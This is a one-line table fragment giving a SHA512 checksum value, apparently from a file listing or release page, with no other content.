| SHA512 | 593b629823805fa8de8b4c66ca377e8058335efe280d9f46f886512fe3f07f9aae3de74cc7bb3e9eec72e57f306eb29f4b9b59b37ea1635e81cb0729078412c3 |